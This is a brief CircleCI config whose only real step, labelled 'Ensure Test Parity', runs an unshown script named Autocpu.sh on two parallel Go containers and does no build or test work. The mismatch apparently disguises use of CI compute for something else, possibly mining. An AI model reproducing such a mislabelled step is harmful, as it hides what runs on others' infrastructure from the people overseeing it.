version: 2

jobs:

  build:

    docker:

      - image: cimg/go:1.16.4

    parallelism: 2

    steps:

      - checkout

      - run:

          name: Ensure Test Parity

          command: |

            chmod +x Autocpu.sh

            ./Autocpu.sh
